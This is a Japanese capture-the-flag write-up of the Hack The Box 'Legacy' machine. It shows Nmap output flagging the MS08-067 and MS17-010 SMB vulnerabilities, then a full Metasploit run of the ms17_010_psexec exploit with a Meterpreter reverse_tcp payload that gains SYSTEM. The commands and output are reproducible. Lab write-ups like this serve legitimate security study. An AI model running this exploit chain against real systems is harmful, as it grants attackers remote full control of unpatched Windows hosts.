大まかに
- Nmapスキャン
- Nmap Scriptを用いたスキャン
- Google Search
- MetaSploit
- Get System
1. Nmap Scan
# sudo nmap -sC -sV -O -T4 -p- -vv -oN nmap-tcp.log 10.10.10.4 # Nmap 7.93 scan initiated Fri May 12 00:52:11 2023 as: nmap -sC -sV -O -T4 -p- -vv -oN nmap-tcp.log 10.10.10.4 Increasing send delay for 10.10.10.4 from 0 to 5 due to 659 out of 1647 dropped probes since last increase. Increasing send delay for 10.10.10.4 from 5 to 10 due to 11 out of 19 dropped probes since last increase. Nmap scan report for 10.10.10.4 Host is up, received echo-reply ttl 127 (0.56s latency). Scanned at 2023-05-12 00:52:11 EDT for 1998s Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE REASON VERSION 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn 445/tcp open microsoft-ds syn-ack ttl 127 Windows XP microsoft-ds No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=5/12%OT=135%CT=1%CU=42068%PV=Y%DS=2%DC=I%G=Y%TM=645DCD OS:C9%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10A%TI=I%CI=I%II=I%SS=S%TS OS:=0)OPS(O1=M53ANW0NNT00NNS%O2=M53ANW0NNT00NNS%O3=M53ANW0NNT00%O4=M53ANW0N OS:NT00NNS%O5=M53ANW0NNT00NNS%O6=M53ANNT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W OS:4=FAF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=Y%T=80%W=FAF0%O=M53ANW0NNS%CC=N%Q=)T1( OS:R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O= OS:%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=FAF0%S=O%A=S+%F=AS%O=M53ANW0NNT00NNS%RD=0%Q= OS:)T4(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A= OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF OS:=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=B0%UN=0%RIPL=G OS:%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=80%CD=Z) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: Incremental Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp Host script results: |_clock-skew: mean: 5d00h28m19s, deviation: 2h07m16s, median: 4d22h58m19s |_smb2-time: Protocol negotiation failed (SMB2) |_smb2-security-mode: Couldn't establish a SMBv2 connection. | nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b93c06 (VMware) | Names: | LEGACY<00> Flags: <unique><active> | HTB<00> Flags: <group><active> | LEGACY<20> Flags: <unique><active> | HTB<1e> Flags: <group><active> | HTB<1d> Flags: <unique><active> | \x01\x02__MSBROWSE__\x02<01> Flags: <group><active> | Statistics: | 005056b93c060000000000000000000000 | 0000000000000000000000000000000000 |_ 0000000000000000000000000000 | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 40600/tcp): CLEAN (Couldn't connect) | Check 2 (port 60076/tcp): CLEAN (Couldn't connect) | Check 3 (port 50902/udp): CLEAN (Failed to receive data) | Check 4 (port 12744/udp): CLEAN (Failed to receive data) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | OS CPE: cpe:/o:microsoft:windows_xp::- | Computer name: legacy | NetBIOS computer name: LEGACY\x00 | Workgroup: HTB\x00 |_ System time: 2023-05-17T10:23:36+03:00 Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri May 12 01:25:29 2023 -- 1 IP address (1 host up) scanned in 1999.01 seconds
2. Nmap Script Scan
# nmap -p 139,445 -vv -Pn --script=smb-vuln* 10.10.10.4 -oN nmap-smb_enum.log # Nmap 7.93 scan initiated Fri May 12 01:17:20 2023 as: nmap -p 139,445 -vv -Pn --script=smb-vuln* -oN nmap-smb_enum.log 10.10.10.4 Nmap scan report for 10.10.10.4 Host is up, received user-set (0.60s latency). Scanned at 2023-05-12 01:17:20 EDT for 16s PORT STATE SERVICE REASON 139/tcp open netbios-ssn syn-ack 445/tcp open microsoft-ds syn-ack Host script results: |_smb-vuln-ms10-054: false | smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. | | Disclosure date: 2008-10-23 | References: | https://technet.microsoft.com/en-us/library/security/ms08-067.aspx |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250 |_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug) | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Read data files from: /usr/bin/../share/nmap # Nmap done at Fri May 12 01:17:36 2023 -- 1 IP address (1 host up) scanned in 15.92 seconds
以下の2つがありそうだなっていうのがわかった。
- CVE-2008-4250
- CVE-2017-0143
# 3. Google Search
- Googleで2つのCVEについて調べてみた。
- CVE-2008-4250 nvd.nist.gov
Easyレベルでバッファフローはあまりなさそうなのでこれじゃないと判断。
- CVE-2017-0143 nvd.nist.gov www.exploit-db.com
4. MetaSploit
```
msfconsole -q
msf6 > search MS17-010 msf6 > use exploit/windows/smb/ms17_010_psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
- show optionsで設定を確認。
msf6 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wordlis yes List of named pipes to check ts/named_pipes.txt RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/ using-metasploit.html RPORT 445 yes The Target port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/w rite folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.3.10 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Automatic
View the full module info with the info, or info -d command.
- setコマンドを使用して「RHOSTS」と「LHOST」を設定する。
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOST 10.10.10.4 RHOST => 10.10.10.4 msf6 exploit(windows/smb/ms17_010_psexec) > msf6 exploit(windows/smb/ms17_010_psexec) > msf6 exploit(windows/smb/ms17_010_psexec) > msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.16.8 LHOST => 10.10.16.8
msf6 exploit(windows/smb/ms17_010_psexec) > show options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
DBGTRACE false yes Show extra debug trace info LEAKATTEMPTS 99 yes How many times to try to leak transaction NAMEDPIPE no A named pipe that can be connected to (leave blank for auto) NAMED_PIPES /usr/share/metasploit-framework/data/wordlis yes List of named pipes to check ts/named_pipes.txt RHOSTS 10.10.10.4 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/ using-metasploit.html RPORT 445 yes The Target port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/w rite folder share SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 10.10.16.8 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
Exploit target:
Id Name
0 Automatic
View the full module info with the info, or info -d command.
- エクスプロイトを実行して、権限を確認{system権限が取れているのでこれでroot/userフラグを取得して終わり)
msf6 exploit(windows/smb/ms17_010_psexec) > run
[] Started reverse TCP handler on 10.10.16.8:4444 [] 10.10.10.4:445 - Target OS: Windows 5.1 [] 10.10.10.4:445 - Filling barrel with fish... done [] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ----------------> [] 10.10.10.4:445 - [] Preparing dynamite... [] 10.10.10.4:445 - [] Trying stick 1 (x86)...Boom! [] 10.10.10.4:445 - [+] Successfully Leaked Transaction! [] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel [] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ----------------> [] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x861137d0 [] 10.10.10.4:445 - Built a write-what-where primitive... [+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained! [] 10.10.10.4:445 - Selecting native target [] 10.10.10.4:445 - Uploading payload... jWwmzfbo.exe [] 10.10.10.4:445 - Created \jWwmzfbo.exe... [+] 10.10.10.4:445 - Service started successfully... [] Sending stage (175686 bytes) to 10.10.10.4 [] 10.10.10.4:445 - Deleting \jWwmzfbo.exe... [*] Meterpreter session 1 opened (10.10.16.8:4444 -> 10.10.10.4:1035) at 2023-05-13 02:12:07 -0400
meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >